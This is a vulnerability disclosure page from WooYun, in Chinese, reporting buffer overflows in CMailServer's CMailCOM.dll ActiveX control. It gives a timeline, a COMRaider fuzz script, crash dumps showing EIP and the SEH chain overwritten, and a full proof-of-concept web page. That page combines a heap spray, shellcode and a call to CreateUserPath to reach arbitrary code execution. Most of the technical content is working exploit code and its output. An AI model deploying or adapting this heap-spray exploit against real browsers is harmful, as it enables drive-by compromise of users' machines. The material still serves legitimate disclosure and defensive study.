当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-054443

漏洞标题:CMailServer Activex控件 CreateUserPath函数缓冲区溢出漏洞

相关厂商:遥志

漏洞作者: cloud4986

提交时间:2014-03-26 12:44

修复时间:2014-05-10 12:45

公开时间:2014-05-10 12:45

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-03-26: 细节已通知厂商并且等待厂商处理中
2014-03-30: 厂商已经确认,细节仅向厂商公开
2014-04-09: 细节向核心白帽子及相关领域专家公开
2014-04-19: 细节向普通白帽子公开
2014-04-29: 细节向实习白帽子公开
2014-05-10: 细节向公众公开

简要描述:

遥志邮件服务器CmailServer5.4.6及以下版本activex插件(CMailCOM.dll)CreateUserPath、AddAttach、DeleteMailByUID、DeleteMailEx、SetBcc、GetMailDataEx、GetMailInfoEx、Logout、MoveToFolder、MoveToInbox、SetBody、SetCc、SetForwardSign、SetFrom、SetFromUID、SetReadSign、SetReplySign、SetSubject、SetTo等10多个函数存在缓冲区溢出漏洞,该漏洞允许通过恶意网页执行任意代码

详细说明:

对遥志邮件服务器CmailServer5.4.6及以下版本activex插件(CMailCOM.dll)CreateUserPath、AddAttach、DeleteMailByUID、DeleteMailEx、SetBcc、GetMailDataEx、GetMailInfoEx、Logout、MoveToFolder、MoveToInbox、SetBody、SetCc、SetForwardSign、SetFrom、SetFromUID、SetReadSign、SetReplySign、SetSubject、SetTo等10多个函数的String参数,构造超长串会导致缓冲区溢出发生,导致覆盖返回地址或seh链从而执行任意代码。

漏洞证明:

(先给出CreateUserPath证明,其余在获取到邀请码后上传)
漏洞名称:CreateUserPath函数存在缓冲区溢出漏洞
影响版本:CmailServer5.4.6以下版本
验证环境:winxp中文版sp1 ie6.0(sp3中文,ie6.0-ie7.0)
问题详情:(Fuzz测试结果)
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:6971D9B8-B53E-4C25-A414-76199768A592' id='target' />
<script language='vbscript'>
'File Generated by COMRaider v0.0.133 - http://labs.idefense.com
'Wscript.echo typename(target)
'for debugging/custom prolog
targetFile = "C:\CMailServer2\CMailCOM.dll"
prototype = "Sub CreateUserPath ( ByVal bsUser As String )"
memberName = "CreateUserPath"
progid = "CMAILCOMLib.POP3"
argCount = 1
arg1=String(3092, "A")
target.CreateUserPath arg1
</script></job></package>
Exception Code: VC_THROW_SEH
Disasm: 77E53887 POP ESI (KERNEL32.dll)
Seh Chain:
--------------------------------------------------
1 1583910 CMailCOM.DLL
2 41414141
Called From Returns To
--------------------------------------------------
KERNEL32.77E53887 CMailCOM.156F3C4
CMailCOM.156F3C4 CMailCOM.156A848
CMailCOM.156A848 CMailCOM.15676B1
CMailCOM.15676B1 CMailCOM.155FC05
CMailCOM.155FC05 41414141
Registers:
--------------------------------------------------
EIP 77E53887 -> E06D7363 -> Asc: csmcsm
EAX 0012A98C -> E06D7363 -> Asc: csmcsm
EBX 015848A4 -> 01547E60
ECX 00000000
EDX 0012AA2C -> 01591DE4
EDI 0012AA1C -> 0012AA48
ESI 0012AA1C -> 0012AA48
EBP 0012A9DC -> 0012AA1C
ESP 0012A988 -> 01586430 -> Asc: 0dX0dX
Block Disassembly:
--------------------------------------------------
77E53877 LEA EDI,[EBP-3C]
77E5387A REP MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI]
77E5387C POP EDI
77E5387D LEA EAX,[EBP-50]
77E53880 PUSH EAX
77E53881 CALL [77E41500]
77E53887 POP ESI <--- CRASH
77E53888 LEAVE
77E53889 RETN 10
77E5388C PUSH 18
77E5388E PUSH 77E63028
77E53893 CALL 77E5A2D8
77E53898 MOV EAX,FS:[18]
77E5389E MOV ESI,[EAX+30]
77E538A1 CALL [77E410B8]
ArgDump:
--------------------------------------------------
EBP+8 E06D7363
EBP+12 00000001
EBP+16 00000003
EBP+20 0012AA10 -> 19930520
EBP+24 0012ADA1 -> 60015839 -> Asc: 9X9X
EBP+28 0016EC84 -> 00140008
Stack Dump:
--------------------------------------------------
12A988 30 64 58 01 63 73 6D E0 01 00 00 00 00 00 00 00 [.dX.csm.........]
12A998 87 38 E5 77 03 00 00 00 20 05 93 19 2C AA 12 00 [...w............]
12A9A8 18 9E 58 01 07 00 00 00 00 00 00 00 00 00 00 00 [..X.............]
12A9B8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]
12A9C8 FF FF FF FF FF FF FF FF 34 0C 00 00 14 E7 12 00 [................]
Exception Code: ACCESS_VIOLATION
Disasm: 41414141 ????? ()
Seh Chain:
--------------------------------------------------
1 41414141
Called From Returns To
--------------------------------------------------
Registers:
--------------------------------------------------
EIP 41414141
EAX 00000000
EBX 015848A4 -> 01547E60
ECX 77F5166A -> 56000CC2
EDX 00140608 -> 77FC3460 -> Asc: `4`4
EDI 00000000
ESI 0016EC84 -> 00140008
EBP 41414141
ESP 0012E934 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Block Disassembly:
--------------------------------------------------
41414141 ????? <--- CRASH
Stack Dump:
--------------------------------------------------
12E934 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
12E944 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
12E954 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
12E964 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
12E974 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
POC代码:
<html>
<body>
<object classid='clsid:6971D9B8-B53E-4C25-A414-76199768A592' id='target' /></object>
<script>
var nops = unescape("%u9090%u9090");
var shellcode="\u68fc\u0a6a\u1e38\u6368\ud189\u684f\u7432\u0c91\uf48b\u7e8d\u33f4\ub7db\u2b04\u66e3\u33bb\u5332\u7568\u6573\u5472\ud233\u8b64\u305a\u4b8b\u8b0c\u1c49\u098b\u698b\uad08\u6a3d\u380a\u751e\u9505\u57ff\u95f8\u8b60\u3c45\u4c8b\u7805\ucd03\u598b\u0320\u33dd\u47ff\u348b\u03bb\u99f5\ube0f\u3a06\u74c4\uc108\u07ca\ud003\ueb46\u3bf1\u2454\u751c\u8be4\u2459\udd03\u8b66\u7b3c\u598b\u031c\u03dd\ubb2c\u5f95\u57ab\u3d61\u0a6a\u1e38\ua975\udb33\u6853\u6577\u7473\u6668\u6961\u8b6c\u53c4\u5050\uff53\ufc57\uff53\uf857";
while (nops.length < 0x100000)
nops += nops;
nops=nops.substring(0,0x100000/2-32/2-4/2-2/2-shellcode.length);
nops=nops+shellcode;
var memory = new Array();
for (var i=0;i<250;i++)
memory[i] += nops;
var str = '';
while(str.length < 2048) str += '\x0C\x0C\x0C\x0C'; //
target.CreateUserPath(str);
</script>
</body>
</html>

修复方案:

目前厂商还没有修补措施,可以先禁用activex控件和脚本

版权声明:转载请注明来源 cloud4986@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2014-03-30 23:09

厂商回复:

可用于挂马威胁,对于白帽子提交的多个漏洞,拟披量收录并协调软件生产厂商。

最新状态:

暂无